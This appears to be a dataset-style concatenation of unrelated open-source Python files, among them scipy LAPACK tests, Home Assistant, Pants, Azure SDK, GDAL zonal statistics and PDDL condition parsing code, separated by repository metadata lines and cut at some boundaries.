x, scale, info = trsyl(a1, b1, c1, trana=trans, tranb=trans)
assert_array_almost_equal(
np.dot(a1.conjugate().T, x) + np.dot(x, b1.conjugate().T),
scale * c1, decimal=4)
x, scale, info = trsyl(a1, b1, c1, isgn=-1)
assert_array_almost_equal(np.dot(a1, x) - np.dot(x, b1),
scale * c1, decimal=4)
def test_lange(self):
a = np.array([
[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]])
for dtype in 'fdFD':
for norm_str in 'Mm1OoIiFfEe':
a1 = a.astype(dtype)
if dtype.isupper():
# is complex dtype
a1[0, 0] += 1j
lange, = get_lapack_funcs(('lange',), (a1,))
value = lange(norm_str, a1)
if norm_str in 'FfEe':
if dtype in 'Ff':
decimal = 3
else:
decimal = 7
ref = np.sqrt(np.sum(np.square(np.abs(a1))))
assert_almost_equal(value, ref, decimal)
else:
if norm_str in 'Mm':
ref = np.max(np.abs(a1))
elif norm_str in '1Oo':
ref = np.max(np.sum(np.abs(a1), axis=0))
elif norm_str in 'Ii':
ref = np.max(np.sum(np.abs(a1), axis=1))
assert_equal(value, ref)
class TestLapack:
def test_flapack(self):
if hasattr(flapack, 'empty_module'):
# flapack module is empty
pass
def test_clapack(self):
if hasattr(clapack, 'empty_module'):
# clapack module is empty
pass
class TestLeastSquaresSolvers:
def test_gels(self):
seed(1234)
# Test fat/tall matrix argument handling - gh-issue #8329
for ind, dtype in enumerate(DTYPES):
m = 10
n = 20
nrhs = 1
a1 = rand(m, n).astype(dtype)
b1 = rand(n).astype(dtype)
gls, glslw = get_lapack_funcs(('gels', 'gels_lwork'), dtype=dtype)
# Request of sizes
lwork = _compute_lwork(glslw, m, n, nrhs)
_, _, info = gls(a1, b1, lwork=lwork)
assert_(info >= 0)
_, _, info = gls(a1, b1, trans='TTCC'[ind], lwork=lwork)
assert_(info >= 0)
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
                nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
            lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
lqr_truth, _, _, _ = geqrf(a1)
assert_array_equal(lqr, lqr_truth)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1
|
uber-common/deck.gl
|
bindings/pydeck/pydeck/types/string.py
|
Python
|
mit
| 531
| 0
|
from functools import total_ordering
|
from .base import PydeckType
@total_ordering
class String(PydeckType):
"""Indicate a string value in pydeck
Parameters
    ----------
value : str
Value of the string
"""
def __init__(self, s: str, quote_type: str = ""):
self.value = f"{quote_type}{s}{quote_type}"
def __lt__(self, other):
return str(self) < str(other)
def __eq__(self, other):
return str(self) == str(other)
def __repr__(self):
return self.value
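# Hedged usage sketch (illustrative, not part of the original module):
#
#   s = String("coordinates", quote_type="'")
#   repr(s)                                     # -> "'coordinates'"
#   s == String("coordinates", quote_type="'")  # True; comparisons go through str()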
|
pantsbuild/pants
|
src/python/pants/backend/python/macros/poetry_requirements_caof.py
|
Python
|
apache-2.0
| 3,874
| 0.003098
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
from typing import Iterable, Mapping
from packaging.utils import canonicalize_name as canonicalize_project_name
from pants.backend.python.macros.caof_utils import (
OVERRIDES_TYPE,
flatten_overrides_to_dependency_field,
)
from pants.backend.python.macros.poetry_requirements import PyProjectToml, parse_pyproject_toml
from pants.backend.python.target_types import normalize_module_mapping
from pants.core.target_types import TargetGeneratorSourcesHelperTarget
class PoetryRequirementsCAOF:
"""Translates dependencies specified in a pyproject.toml Poetry file to a set of
"python_requirements_library" targets.
For example, if pyproject.toml contains the following entries under
poetry.tool.dependencies: `foo = ">1"` and `bar = ">2.4"`,
python_requirement(
name="foo",
requirements=["foo>1"],
)
python_requirement(
name="bar",
requirements=["bar>2.4"],
)
See Poetry documentation for correct specification of pyproject.toml:
https://python-poetry.org/docs/pyproject/
You may also use the parameter `module_mapping` to teach Pants what modules each of your
requirements provide. For any requirement unspecified, Pants will default to the name of the
    requirement. This setting is important for Pants to know how to convert your import
statements back into your dependencies. For example:
poetry_requirements(
module_mapping={
"ansicolors": ["colors"],
"setuptools": ["pkg_resources"],
}
)
"""
|
def __init__(self, parse_context):
self._parse_context = parse_context
def __call__(
self,
*,
source: str = "pyproject.toml",
module_mapping: Mapping[str, Iterable[str]] | None = None,
type_stubs_module_mapping: Mapping[str, Iterable[str]] | None = None,
overrides: OVERRIDES_TYPE = None,
) -> None:
"""
:param module_mapping: a mapping of requirement names to a list of the modules they provide.
For example, `{"ansicolors": ["colors"]}`. Any unspecified requirements will use the
requirement name as the default module, e.g. "Django" will default to
`modules=["django"]`.
"""
req_file_tgt = self._parse_context.create_object(
TargetGeneratorSourcesHelperTarget.alias,
name=source.replace(os.path.sep, "_"),
sources=[source],
)
requirements_dep = f":{req_file_tgt.name}"
normalized_module_mapping = normalize_module_mapping(module_mapping)
normalized_type_stubs_module_mapping = normalize_module_mapping(type_stubs_module_mapping)
dependencies_overrides = flatten_overrides_to_dependency_field(
overrides, macro_name="python_requirements", build_file_dir=self._parse_context.rel_path
)
requirements = parse_pyproject_toml(
PyProjectToml.deprecated_macro_create(self._parse_context, source)
)
for parsed_req in requirements:
normalized_proj_name = canonicalize_project_name(parsed_req.project_name)
self._parse_context.create_object(
"python_requirement",
name=parsed_req.project_name,
requirements=[parsed_req],
modules=normalized_module_mapping.get(normalized_proj_name),
type_stub_modules=normalized_type_stubs_module_mapping.get(normalized_proj_name),
dependencies=[
requirements_dep,
*dependencies_overrides.get(normalized_proj_name, []),
],
)
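# Hedged usage sketch (illustrative, not from the original file): in a BUILD
# file this macro is typically written as
#
#   poetry_requirements(
#       module_mapping={"ansicolors": ["colors"]},
#   )
#
# which reads the adjacent pyproject.toml and emits one python_requirement
# target per declared dependency, as the class docstring above describes.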
|
jamespcole/home-assistant
|
homeassistant/components/googlehome/__init__.py
|
Python
|
apache-2.0
| 3,612
| 0
|
"""Support Google Home units."""
import logging
import asyncio
import voluptuous as vol
from homeassistant.const import CONF_DEVICES, CONF_HOST
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['googledevices==1.0.2']
DOMAIN = 'googlehome'
CLIENT = 'googlehome_client'
NAME = 'GoogleHome'
CONF_DEVICE_TYPES = 'device_types'
CONF_RSSI_THRESHOLD = 'rssi_threshold'
CONF_TRACK_ALARMS = 'track_alarms'
CONF_TRACK_DEVICES = 'track_devices'
DEVICE_TYPES = [1, 2, 3]
DEFAULT_RSSI_THRESHOLD = -70
DEVICE_CONFIG = vol.Schema({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_DEVICE_TYPES, default=DEVICE_TYPES):
vol.All(cv.ensure_list, [vol.In(DEVICE_TYPES)]),
vol.Optional(CONF_RSSI_THRESHOLD, default=DEFAULT_RSSI_THRESHOLD):
vol.Coerce(int),
vol.Optional(CONF_TRACK_ALARMS, default=False): cv.boolean,
vol.Optional(CONF_TRACK_DEVICES, default=True): cv.boolean,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_DEVICES): vol.All(cv.ensure_list, [DEVICE_CONFIG]),
}),
}, extra=vol.ALLOW_EXTRA)
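# Hedged configuration sketch derived from the schema above (the host and
# option values are placeholders); a configuration.yaml entry would look
# roughly like:
#
#   googlehome:
#     devices:
#       - host: 192.168.1.20
#         track_alarms: true
#         rssi_threshold: -70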
async def async_setup(hass, config):
"""Set up the Google Home component."""
hass.data[DOMAIN] = {}
hass.data[CLIENT] = GoogleHomeClient(hass)
for device in config[DOMAIN][CONF_DEVICES]:
hass.data[DOMAIN][device['host']] = {}
if device[CONF_TRACK_DEVICES]:
|
hass.async_create_task(
discovery.async_load_platform(
hass, 'device_tracker', DOMAIN, device, config))
if device[CONF_TRACK_ALARMS]:
hass.async_create_task(
discovery.async_load_platform(
hass, 'sensor', DOMAIN, device, config))
return True
class GoogleHomeClient:
"""Handle all communication with the Google Home unit."""
def __init__(self, hass):
"""Initialize the
|
Google Home Client."""
self.hass = hass
self._connected = None
async def update_info(self, host):
"""Update data from Google Home."""
from googledevices.api.connect import Cast
_LOGGER.debug("Updating Google Home info for %s", host)
session = async_get_clientsession(self.hass)
device_info = await Cast(host, self.hass.loop, session).info()
device_info_data = await device_info.get_device_info()
self._connected = bool(device_info_data)
self.hass.data[DOMAIN][host]['info'] = device_info_data
async def update_bluetooth(self, host):
"""Update bluetooth from Google Home."""
from googledevices.api.connect import Cast
_LOGGER.debug("Updating Google Home bluetooth for %s", host)
session = async_get_clientsession(self.hass)
bluetooth = await Cast(host, self.hass.loop, session).bluetooth()
await bluetooth.scan_for_devices()
await asyncio.sleep(5)
bluetooth_data = await bluetooth.get_scan_result()
self.hass.data[DOMAIN][host]['bluetooth'] = bluetooth_data
async def update_alarms(self, host):
"""Update alarms from Google Home."""
from googledevices.api.connect import Cast
_LOGGER.debug("Updating Google Home bluetooth for %s", host)
session = async_get_clientsession(self.hass)
assistant = await Cast(host, self.hass.loop, session).assistant()
alarms_data = await assistant.get_alarms()
self.hass.data[DOMAIN][host]['alarms'] = alarms_data
|
Azure/azure-sdk-for-python
|
sdk/agfood/azure-mgmt-agfood/azure/mgmt/agfood/aio/__init__.py
|
Python
|
mit
| 588
| 0.003401
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._azure_ag_food_platform_rp_service import AzureAgFoodPlatformRPService
__all__ = ['AzureAgFoodPlatformRPService']
|
ocwc/ocwc-data
|
search/data/management/commands/courses.py
|
Python
|
apache-2.0
| 3,372
| 0.005635
|
# -*- coding: utf-8 -*-
from optparse import make_option
from django.core.management.base import BaseCommand
from messytables import XLSTableSet, headers_guess, headers_processor, offset_processor
from data.models import Source, Course, MerlotCategory
class Command(BaseCommand):
help = "Utilities to merge our database with MERLOT"
args = "--file"
option_list = BaseCommand.option_list + (
make_option("--file", action="store", dest="filename", help="Source filename"),
make_option("--source", action="store", dest="source_id", help="Source ID"),
make_option("--provider", action="store", dest="provider_tag", help="Provider Tag"),
)
def handle(self, *args, **options):
if options.get('filename'):
self.ku_openlearning(options.get('filename'), options.get('source_id'))
def ku_openlearning(self, filename, source_id):
CATEGORY_MAPPING = {
'Assessment of learning': 2298, #Assessment,
'Finance': 2235,
'Public Service': 'Criminal Justice',
            'Health Science': 'Health Sciences',
'Management': 2248,
'Online Instruction': 'Hybrid and Online Course Development',
'Early Childhood': ['Career Counseling and Services', 'Childhood and Adolescence'],
'Law, Legal': 'Law',
'Psychology': 'Psychology',
'Customer Service': 2246,
            'Communications': 'Communications',
'Professionalism': 'Personal Development'
}
source = Source.objects.get(pk=source_id)
fh = open(filename, 'rb')
table_set = XLSTableSet(fh)
row_set = table_set.tables[0]
offset, headers = headers_guess(row_set.sample)
row_set.register_processor(headers_processor(headers))
row_set.register_processor(offset_processor(offset + 1))
for row in row_set:
url = row[0].value
title = row[1].value
description = row[2].value
# language = row[4].value
# material_type = row[5].value
license = row[6].value
categories = row[7].value
keywords = row[8].value
# audience = row[9].value
course, is_created = Course.objects.get_or_create(
linkurl = url,
provider = source.provider,
source = source,
defaults = {
'title': title,
'description': description,
'tags': keywords,
'language': 'English',
'license': license,
'content_medium': 'text',
'creative_commons': 'Yes',
'creative_commons_commercial': 'No',
'creative_commons_derivatives': 'No'
}
)
merlot_cat = CATEGORY_MAPPING[categories]
if type(merlot_cat) != list:
merlot_cat = [merlot_cat,]
for item in merlot_cat:
try:
m = MerlotCategory.objects.get(merlot_id=item)
course.merlot_categories.add(m)
except ValueError:
m = MerlotCategory.objects.get(name=item)
course.merlot_categories.add(m)
|
MBoustani/Geothon
|
Spatial Analyst Tools/zonal_statistics.py
|
Python
|
apache-2.0
| 2,677
| 0.007471
|
#!/usr/bin/env python
'''
Project: Geothon (https://github.com/MBoustani/Geothon)
File: Vector/zonal_statistics.py
Description: This code calculates statistics of GeoTIFF with polygon Shapefile
Author: Maziyar Boustani (github.com/MBoustani)
'''
import numpy as np
try:
import ogr
except ImportError:
from osgeo import ogr
try:
import gdal
except ImportError:
from osgeo import gdal
from gdalconst import GA_ReadOnly
import sys
gtif_file = "/path/to/tif"
gtif_dataset = gdal.Open(gtif_file, GA_ReadOnly)
shp_file = '/path/to/shp'
driver = ogr.GetDriverByName('ESRI Shapefile')
shp_datasource = driver.Open(shp_file)
#layer_num = shp_datasource.GetLayerCount()
layer = shp_datasource.GetLayer()
transform = gtif_dataset.GetGeoTransform()
xOrigin = transform[0]
yOrigin = transform[3]
pixelWidth = transform[1]
pixelHeight = transform[5]
features_number = layer.GetFeatureCount()
f=open('table.txt','w')
f.write('ID, mean\n')
for each_feature in range(features_number):
feature = layer.GetFeature(each_feature)
feature_geom = feature.GetGeometryRef()
pointsX = []
pointsY = []
feature_geom_type = feature_geom.GetGeometryName()
#we need to get points from each feature
# so if it is Multipolygon we should get polygon
# first, ring from polygon after and points data
# from ring geometry
if (feature_geom_type == 'MULTIPOLYGON'):
num_geoms = feature_geom.GetGeometryCount()
for geom in range(num_geoms):
geomInner = feature_geom.GetGeometryRef(geom)
ring = geomInner.GetGeometryRef(0)
elif (feature_geom_type == 'POLYGON'):
ring = feature_geom.GetGeometryRef(0)
else:
sys.exit("ERROR: Feature geometry needs to be either Polygon or Multipolygon")
numpoints = ring.GetPointCount()
for point in range(numpoints):
lon, lat, z = ring.GetPoint(point)
pointsX.append(lon)
pointsY.append(lat)
#calculate feature spatial extent
xmin = min(pointsX)
xmax = max(pointsX)
ymin = min(pointsY)
ymax = max(pointsY)
#get feature ID (first column in shapefile attribute table)
ID = feature.GetFieldAsInteger(1)
xoff = int((xmin - xOrigin)/pixelWidth)
yoff = int((yOrigin - ymax)/pixelWidth)
xcount = int((xmax - xmin)/pixelWidth)+1
ycount = int((ymax - ymin)/pixelWidth)+1
banddataraster = gtif_dataset.GetRasterBand(1)
if xoff < 0:
xoff = 0
if yoff< 0:
yoff =0
dataraster = banddataraster.ReadAsArray(xoff, yoff, xcount, ycount)#.astype(np.float)
mean = np.mean(dataraster)
f.write('{0}, {1}\n'.format(ID, mean))
|
HaseloffLab/PartsDB
|
partsdb/tools/CoordinateMapper/testCoordinateMapper.py
|
Python
|
mit
| 13,945
| 0.001004
|
#!/usr/bin/python
from functools import wraps
import unittest
from CoordinateMapper import CoordinateMapper
from MapPositions import GenomePositionError
from MapPositions import ProteinPositionError
from MapPositions import CDSPosition, CDSPositionError
from SeqFeature import FeatureLocation, SeqFeature
from Bio.SeqRecord import SeqRecord
exons = [(5808, 5860), (6757, 6874), (7767, 7912), (13709, 13785)]
cmap = CoordinateMapper(exons)
g_exons = xrange(7868, 7875) # len 7
c_exons = xrange(270, 279) # len 9
p_exons = xrange(90, 93) # len 3
p_exons_trip = [p for p in p_exons for n in range(3)] # len 9
c_exon_prs = ((270, 272), (273, 275), (276, 278)) # len 3
g_exon_prs = ((7868, 7870), (7871, 7873), (7874, 7876)) # len 3
g_introns = {None: (5860, 5861, 6308, 6309, 6755, 6756),
'HGVS': (5861, 5862, 6309, 6310, 6756, 6757)}
c_introns = {None: ('51+1', '51+2', '51+449', '52-448', '52-2', '52-1'),
'HGVS': ('52+1', '52+2', '52+449', '53-448', '53-2', '53-1')}
c_intron_tups = ((51, 1), (51, 2), (51, 449), (52, -448), (52, -2), (52, -1))
g_outside = {None: (0, 13785, 14000), 'HGVS': (1, 13786, 14001)}
c_outside = {None: ('-5808', '+1', '+216'), 'HGVS': ('-5808', '*1', '*216')}
c_outside_tups = ((None, -5808), (None, 1), (None, 216))
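# Reading of the fixtures above (added note, hedged): intron positions are
# written "<CDS anchor><signed offset>", so '51+1' is one base past CDS
# position 51, matching the (anchor, offset) pairs in c_intron_tups, while
# positions outside the CDS use a None anchor as in c_outside_tups.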
def two_dialects(fn):
@wraps(fn)
def call_tests(self):
orig_dialect = self.dialect
for dialect in (None, 'HGVS'):
self.dialect = dialect
fn(self)
self.dialect = orig_dialect
return call_tests
class TestCDSPosition(unittest.TestCase):
"""Test that CDSPosition works properly"""
def setUp(self):
self.dialect = None
@two_dialects
def testGoodIntron(self):
"""CDSPosition should match good intron values"""
for c_args, c in zip(c_intron_tups, c_introns[self.dialect]):
actual = CDSPosition.from_anchor(*c_args).to(self.dialect)
            self.assertEqual(actual, c)
@two_dialects
def testGoodOutside(self):
"""CDSPosition should match good outside-CDS values"""
for c_args, c in zip(c_outside_tups, c_outside[self.dialect]):
actual = CDSPosition.from_anchor(*c_args).to(self.dialect)
self.assertEqual(actual, c)
    def testEqual(self):
"""CDSPosition should test equal with same args"""
for args in c_intron_tups:
CPos = CDSPosition.from_anchor
self.assertEqual(CPos(*args), CPos(*args))
self.assertEqual(str(CPos(*args)), str(CPos(*args)))
#def testEqualDialects(self):
#for c_pos in c_outside:
#self.assertEqual(CDSPosition(c_pos), CDSPosition.from_hgvs(c_pos))
#self.assertEqual(c_pos, CDSPosition.from_hgvs(c_pos).to_hgvs())
def testBadAnchor(self):
"""CDSPosition should fail with negative CDS anchor"""
self.assertRaises(CDSPositionError, CDSPosition.from_anchor, -1, 1)
def testBadOffset(self):
"""CDSPosition should fail with zero offset"""
self.assertRaises(CDSPositionError, CDSPosition.from_anchor, None, 0)
def testValidate(self):
"""Setting CDSPosition anchor offset should fail for invalid cases"""
intron = CDSPosition("22+4")
self.assertRaises(CDSPositionError, setattr, intron, "offset", 0)
self.assertRaises(CDSPositionError, setattr, intron, "anchor", -5)
exon = CDSPosition("60")
self.assertRaises(CDSPositionError, setattr, exon, "anchor", None)
class TestCoordinateMapper(unittest.TestCase):
"""Test that CoordinateMapper works properly"""
def setUp(self):
self.sf = SeqFeature(sum((FeatureLocation(s, e) for s, e in exons)),
type="CDS")
def testListInit(self):
"""CoordinateMapper should take list of exon pairs"""
cm = CoordinateMapper(exons)
# FIXME CompoundLocation does not have __eq__
self.assertEqual(str(cm.exons), str(self.sf.location))
def testSeqRecordInit(self):
"""CoordinateMapper should use first CDS feature of SeqRecord"""
sr = SeqRecord("", features=[self.sf])
cm = CoordinateMapper(sr)
self.assertEqual(str(cm.exons), str(self.sf.location))
def testSeqFeatureInit(self):
"""CoordinateMapper should take a CDS SeqFeature"""
cm = CoordinateMapper(self.sf)
self.assertEqual(str(cm.exons), str(self.sf.location))
def testEmptyInit(self):
"""CoordinateMapper should fail with no arguments"""
self.assertRaises(Exception, CoordinateMapper)
class Testg2c(unittest.TestCase):
"""Test success of good input and failure of bad input to g2c"""
def setUp(self):
self.dialect = None
# what it should do
# any integer should return
def testGoodExons(self):
"""g2c should work for exon positions"""
for arg, expected in zip(g_exons, c_exons):
self.assertEqual(cmap.g2c(arg), expected)
@two_dialects
def testGoodIntronsStr(self):
"""g2c should work for intron positions (string)"""
dia = self.dialect
for arg, expect in zip(g_introns[dia], c_introns[dia]):
actual = cmap.g2c(arg, dia).to(dia)
self.assertEqual(actual, expect)
@two_dialects
def testGoodIntrons(self):
"""g2c should work for intron positions (CDSPosition)"""
for arg, tup in zip(g_introns[self.dialect], c_intron_tups):
actual = cmap.g2c(arg, self.dialect)
expect = CDSPosition.from_anchor(*tup)
self.assertEqual(actual, expect)
self.assertEqual(str(actual), str(expect))
@two_dialects
def testGoodOutsideStr(self):
"""g2c should work for outside positions (string)"""
dia = self.dialect
for arg, expected in zip(g_outside[dia], c_outside[dia]):
actual = cmap.g2c(arg, dia).to(dia)
self.assertEqual(actual, expected)
def testGoodOutside(self):
"""g2c should work for outside positions (CDSPosition)"""
for arg, tup in zip(g_outside[self.dialect], c_outside_tups):
actual = cmap.g2c(arg)
expect = CDSPosition.from_anchor(*tup)
self.assertEqual(actual, expect)
self.assertEqual(str(actual), str(expect))
# what it shouldn't do
# should it handle non-exact positions?
@two_dialects
def testZeroArg(self):
"""g2c should work for 0 in no dialect and fail for 1-index"""
args = (0, self.dialect)
if self.dialect is None:
cmap.g2c(*args)
else:
self.assertRaises(GenomePositionError, cmap.g2c, *args)
@two_dialects
def testBadArg(self):
"""g2c should fail on string, float, None, or negative"""
bad = ("string", None, 3.14, -5)
for arg in bad:
self.assertRaises(Exception, cmap.g2c, arg)
#self.assertRaises(GenomePositionError, cmap.g2c, -5)
class Testc2p(unittest.TestCase):
"""Test success of good input and failure of bad input to c2p"""
# what it should do
# integer within length of exon should return correct protein
def testGoodExons(self):
"""c2p should work for exon positions"""
for arg, expect in zip(c_exons, p_exons_trip):
self.assertEqual(cmap.c2p(arg), expect)
# FIXME should CDSPosition return None or raise error?
def testBadNotProtein(self):
"""c2p should fail for CDSPosition or str"""
bad = ("string", CDSPosition.from_anchor(7, -5))
for arg in bad:
self.assertRaises(ValueError, cmap.c2p, arg)
class Testp2c(unittest.TestCase):
"""Test success of good input and failure of bad input to p2c"""
# what it should do
# integer within length of protein should return correct range
def testGoodExons(self):
"""p2c should work for exon positions"""
#for arg, expect in p2c_exons.iteritems():
for arg, expect in zip(p_exons, c_exon_prs):
self.assertEqual(cmap.p2c(arg), expect)
def testBadTooLarge(self):
"""p2c should fail for positions longer than the max length"""
self.a
|
miquelramirez/lwaptk-v2
|
external/fd/pddl/conditions.py
|
Python
|
gpl-3.0
| 13,297
| 0.007596
|
from __future__ import print_function
from . import pddl_types
def parse_condition(alist):
condition = parse_condition_aux(alist, False)
# TODO: The next line doesn't appear to do anything good,
# since uniquify_variables doesn't modify the condition in place.
# Conditions in actions or axioms are uniquified elsewhere, but
# it looks like goal conditions are never uniquified at all
# (which would be a bug).
condition.uniquify_variables({})
return condition
def parse_condition_aux(alist, negated):
"""Parse a PDDL condition. The condition is translated into NNF on the fly."""
tag = alist[0]
if tag in ("and", "or", "not", "imply"):
args = alist[1:]
if tag == "imply":
assert len(args) == 2
if tag == "not":
assert len(args) == 1
return parse_condition_aux(args[0], not negated)
elif tag in ("forall", "exists"):
parameters = pddl_types.parse_typed_list(alist[1])
args = alist[2:]
assert len(args) == 1
elif negated:
return NegatedAtom(alist[0], alist[1:])
else:
return Atom(alist[0], alist[1:])
if tag == "imply":
parts = [parse_condition_aux(args[0], not negated),
parse_condition_aux(args[1], negated)]
tag = "or"
else:
parts = [parse_condition_aux(part, negated) for part in args]
if tag == "and" and not negated or tag == "or" and negated:
return Conjunction(parts)
elif tag == "or" and not negated or tag == "and" and negated:
return Disjunction(parts)
elif tag == "forall" and not negated or tag == "exists" and negated:
return UniversalCondition(parameters, parts)
elif tag == "exists" and not negated or tag == "forall" and negated:
return ExistentialCondition(parameters, parts)
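# Hedged worked example (added for clarity, not in the original source): parsing
#   ["not", ["and", ["p", "?x"], ["q", "?x"]]]
# pushes the negation inward on the fly and yields
#   Disjunction([NegatedAtom("p", ["?x"]), NegatedAtom("q", ["?x"])])
# because a conjunction under negation becomes a disjunction of negated parts.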
def parse_literal(alist):
if alist[0] == "not":
assert len(alist) == 2
alist = alist[1]
return NegatedAtom(alist[0], alist[1:])
else:
return Atom(alist[0], alist[1:])
# Conditions (of any type) are immutable, because they need to
# be hashed occasionally. Immutability also allows more efficient comparison
# based on a precomputed hash value.
#
# Careful: Most other classes (e.g. Effects, Axioms, Actions) are not!
class Condition(object):
def __init__(self, parts):
self.parts = tuple(parts)
self.hash = hash((self.__class__, self.parts))
def __hash__(self):
return self.hash
def __ne__(self, other):
return not self == other
def __lt__(self, other):
return self.hash < other.hash
def __le__(self, other):
return self.hash <= other.hash
def dump(self, indent=" "):
print("%s%s" % (indent, self._dump()))
for part in self.parts:
part.dump(indent + " ")
def _dump(self):
return self.__class__.__name__
def _postorder_visit(self, method_name, *args):
part_results = [part._postorder_visit(method_name, *args)
for part in self.parts]
method = getattr(self, method_name, self._propagate)
return method(part_results, *args)
def _propagate(self, parts, *args):
return self.change_parts(parts)
def simplified(self):
return self._postorder_visit("_simplified")
def relaxed(self):
return self._postorder_visit("_relaxed")
def untyped(self):
return self._postorder_visit("_untyped")
def uniquify_variables(self, type_map, renamings={}):
# Cannot used _postorder_visit because this requires preorder
# for quantified effects.
if not self.parts:
return self
else:
return self.__class__([part.uniquify_variables(type_map, renamings)
for part in self.parts])
def to_untyped_strips(self):
raise ValueError("Not a STRIPS condition: %s" % self.__class__.__name__)
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
raise ValueError("Cannot instantiate condition: not normalized")
def free_variables(self):
result = set()
for part in self.parts:
result |= part.free_variables()
return result
def has_disjunction(self):
for part in self.parts:
if part.has_disjunction():
return True
return False
def has_existential_part(self):
for part in self.parts:
if part.has_existential_part():
return True
return False
def has_universal_part(self):
for part in self.parts:
if part.has_universal_part():
return True
return False
class ConstantCondition(Condition):
# Defining __eq__ blocks inheritance of __hash__, so must set it explicitly.
__hash__ = Condition.__hash__
parts = ()
def __init__(self):
self.hash = hash(self.__class__)
def change_parts(self, parts):
return self
def __eq__(self, other):
return self.__class__ is other.__class__
class Impossible(Exception):
pass
class Falsity(ConstantCondition):
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
raise Impossible()
    def negate(self):
        return Truth()
class Truth(ConstantCondition):
def to_untyped_strips(self):
return []
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
pass
def negate(self):
return Falsity()
class JunctorCondition(Condition):
# Defining __eq__ blocks inheritance of __hash__, so must set it explicitly.
__hash__ = Condition.__hash__
def __eq__(self, other):
# Compare hash first for speed reasons.
return (self.hash == other.hash and
self.__class__ is other.__class__ and
self.parts == other.parts)
def change_parts(self, parts):
return self.__class__(parts)
class Conjunction(JunctorCondition):
def _simplified(self, parts):
result_parts = []
for part in parts:
if isinstance(part, Conjunction):
result_parts += part.parts
elif isinstance(part, Falsity):
return Falsity()
elif not isinstance(part, Truth):
result_parts.append(part)
if not result_parts:
return Truth()
if len(result_parts) == 1:
return result_parts[0]
return Conjunction(result_parts)
def to_untyped_strips(self):
result = []
for part in self.parts:
result += part.to_untyped_strips()
return result
def instantiate(self, var_mapping, init_facts, fluent_facts, result):
assert not result, "Condition not simplified"
for part in self.parts:
part.instantiate(var_mapping, init_facts, fluent_facts, result)
def negate(self):
return Disjunction([p.negate() for p in self.parts])
class Disjunction(JunctorCondition):
def _simplified(self, parts):
result_parts = []
for part in parts:
if isinstance(part, Disjunction):
result_parts += part.parts
elif isinstance(part, Truth):
return Truth()
elif not isinstance(part, Falsity):
result_parts.append(part)
if not result_parts:
return Falsity()
if len(result_parts) == 1:
return result_parts[0]
return Disjunction(result_parts)
def negate(self):
return Conjunction([p.negate() for p in self.parts])
def has_disjunction(self):
return True
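# Illustrative sketch (added; not in the original source): negate() swaps
# Conjunction and Disjunction one junctor at a time, while simplified()
# flattens nested junctors and drops Truth()/Falsity() constants. Assuming
# Atom("p", []) and Atom("q", []) are leaf literals:
#
#     c = Conjunction([Atom("p", []), Truth(), Conjunction([Atom("q", [])])])
#     c.simplified()   # equivalent to Conjunction([Atom("p", []), Atom("q", [])])
#     c.negate()       # a Disjunction containing NegatedAtom("p", []), Falsity(),
#                      # and the negation of the inner conjunction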
class QuantifiedCondition(Condition):
# Defining __eq__ blocks inheritance of __hash__, so must set it explicitly.
__hash__ = Condition.__hash__
def __init__(self, parameters, parts):
self.parameters = tuple(parameters)
self.parts = tuple(parts)
self.hash = hash((self.__class__, self.parameters, self.parts))
def __eq__(self, other):
# Compare hash first for speed reasons.
return (self.hash == other.hash and
                self.__class__ is other.__class__ and
                self.parameters == other.parameters and
                self.parts == other.parts)
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2015_06_15/models/virtual_network_paged.py
|
Python
|
mit
| 962
| 0.00104
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class VirtualNetworkPaged(Paged):
"""
    A paging container for iterating over a list of :class:`VirtualNetwork <azure.mgmt.network.v2015_06_15.models.VirtualNetwork>` objects
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[VirtualNetwork]'}
}
def __init__(self, *args, **kwargs):
super(VirtualNetworkPaged, self).__init__(*args, **kwargs)
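# Usage sketch (illustrative; not part of the generated file): the Paged base
# class makes this container iterable and transparently follows 'nextLink' to
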